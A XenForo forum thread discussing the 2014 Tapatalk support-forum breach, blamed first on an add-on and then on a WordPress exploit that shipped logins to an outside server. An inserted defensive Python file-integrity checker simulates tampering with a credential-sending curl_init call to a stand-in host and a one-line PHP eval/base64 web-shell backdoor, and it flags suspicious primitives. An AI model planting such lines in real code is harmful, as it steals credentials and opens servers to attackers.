Discussion in 'Resource and Add-on Discussions' started by Mouth, Dec 14, 2014.
Does anyone know which add-on? Has this been disclosed to XF?
Hopefully XF will fully inform us ??
Ya, no news yet. But am paying attention to it myself too.
My money is on a badly composed bespoke add-on; I think it would have been reported here first if that wasn't the case.
We know nothing about it.
paul@tapatalk has contacted me and confirmed the exploit was not related to XenForo but to WordPress.
Also stated here: https://support.tapatalk.com/threads/tapatalk-exploit-by-3rd-party-add-on-which.27446/#post-145251
Sounds like they ought to get their facts right before pointing fingers in the future!
Well they blamed an add-on from the start. Was it just WP or was it a bridge plugin causing the actual vulnerability? Sounds like they did point the finger wrong but eh.
This is a terrible email - I got it too - it is worded to quite clearly blame a forum plugin, so when I went and found their forum runs Xenforo, like every Xenforo owner, I panicked. Now they are saying it has nothing to do with Xenforo. Also their email contained a link to the TT client area. When I clicked it, I was already logged in. How is that possible, if they reset the passwords (and I have not logged in for some time either, so I hope the email link was not a direct route to my private area!)? It also took my old password when I reset it. I'd post this on the TT support forum, but I'm scared to log in there now, in case "they" are watching me and stealing my precious bodily fluids.
Agreed. The first thing I thought was that the add-on was hacked, meaning, all of my forum users' info was hacked. Thankfully this was not the case, it turned out only to be users of the Tapatalk XF support forum, and then, only users who had manually logged in since 12/10. Unfortunately, I was one of those as I needed to do so after a username change - and I might note, after I did this, the app on my iOS acted very strangely, I changed my username and it kept wanting to change it back, kept logging me in to my account then erroring out and saying that I had to log in again (in which case it had switched me back to my old login username)...wondering if that is related at all.
Unfortunately, we are going to have to take their word on what was accessed and stolen.
They have said data was being streamed back to a server in Sweden. This being the case, they could have been streaming anything back to it they wanted.
The forum being breached is the best case admittance given what their app does.
After seeing how they have operated over the years, and how they keep introducing more and more bugs into their own app, this is the final straw for me. I reinstalled it for the few members who wanted it. It's gone for good now.
I uninstalled it years ago.
We never bothered installing it as we saw no need for it, and we certainly don't plan on installing it in the future.
I'd like to thank TapaTalk for exposing an email address that has never had a single spam email in its history. I'll just bet that changes now.
@ https://support.tapatalk.com/threads/tapatalk-exploit-by-3rd-party-add-on-which.27446/ they have clarified that it was a WordPress exploit for http://blog.tapatalk.com/ that was installed on the same server. It would seem that this WordPress exploit apparently allowed them to overwrite/replace XF code that shipped usernames and unencrypted passwords at logon time to an external server.
Whilst it is a WP issue, it is a timely reminder for any forum owner that add-on code has the potential to compromise a forum, either through poor coding or something more nefarious.
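The post above describes server-side PHP being replaced so that logins are copied to an outside host. The practical check a forum owner wants after something like that is a file-integrity comparison: hash a known-clean web root, store the manifest off the box, and diff it against a fresh scan whenever another application on the same server is compromised. The following is an added example written for this thread, not code from XenForo, Tapatalk or the original poster. The directory layout, file names and "tampered" contents are constructed for the demo and make no claim about what the real modified files looked like; the list of suspicious PHP primitives is an assumption of what is worth a manual look, not a detection signature.

```python
"""File-integrity check for a forum web root (added example, not XenForo's or
Tapatalk's code). Builds a SHA-256 manifest, diffs it against a later scan, and
flags changed PHP files that contain outbound-network or obfuscation primitives."""

import hashlib
import tempfile
from pathlib import Path

# Assumed list of primitives worth a manual look in a changed PHP file.
SUSPICIOUS = (
    b"curl_init",
    b"file_get_contents('http",
    b'file_get_contents("http',
    b"fsockopen",
    b"base64_decode",
)


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root, suffixes=(".php", ".js", ".htaccess")):
    """Map every code file under root (relative POSIX path) to its SHA-256."""
    root = Path(root)
    manifest = {}
    for p in root.rglob("*"):
        if p.is_file() and (p.suffix in suffixes or p.name in suffixes):
            manifest[p.relative_to(root).as_posix()] = sha256_of(p)
    return manifest


def diff_manifests(baseline, current):
    """Compare a known-good manifest with a fresh scan of the same tree."""
    both = set(baseline) & set(current)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in both if baseline[p] != current[p]),
    }


def grep_suspicious(root, paths):
    """For each changed file, list which SUSPICIOUS primitives it now contains."""
    hits = {}
    for rel in paths:
        data = (Path(root) / rel).read_bytes()
        found = [s.decode() for s in SUSPICIOUS if s in data]
        if found:
            hits[rel] = found
    return hits


def demo():
    """Constructed sample: baseline a tiny fake forum tree, then simulate tampering."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "library").mkdir()
        login = root / "library" / "Login.php"
        login.write_text("<?php\n// pretend login handler (constructed)\n"
                         "return $auth->check($user, $pass);\n")
        (root / "index.php").write_text("<?php require 'library/Login.php';\n")
        baseline = build_manifest(root)  # would normally be stored off-host

        # Simulated tampering: login handler now phones home, plus a dropped backdoor.
        login.write_text(login.read_text() +
                         "\n$c = curl_init('http://example.invalid/collect');\n")
        (root / "library" / "cache.php").write_text(
            "<?php eval(base64_decode($_POST['x']));\n")

        current = build_manifest(root)
        changes = diff_manifests(baseline, current)
        hits = grep_suspicious(root, changes["added"] + changes["modified"])
        return changes, hits


if __name__ == "__main__":
    changes, hits = demo()
    print("changes:", changes)
    print("suspicious:", hits)
```

Take the baseline from a clean install or a fresh checkout of the same version, and keep the manifest somewhere the web server's user cannot write, because an attacker who can overwrite PHP files can also rewrite a manifest that sits beside them. A clean diff only shows that the files you hashed are unchanged; it says nothing about the database, cron entries, or other sites sharing the host.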
Which begs the question, why would the hacker(s) stop at just the support forum? How do we know they haven't modified other code or other exploits and have gathered personal forum admin information such as name, address, business tax id / SSN for those admins that have monetization enabled via tapatalk?
This entire process has been a cluster fluff from the start. An email telling users to reset their password with the links pointing to the Tapatalk Admin CP, then stating the Admin CP wasn't hacked but only the support forums. Stating old passwords have been de-activated when in fact old passwords still worked fine. Blaming a XF addon then reporting it wasn't XF but instead Wordpress or some addon for WP.
For me, I get the feeling they have no idea what has or hasn't been compromised nor how said hacker did their deed.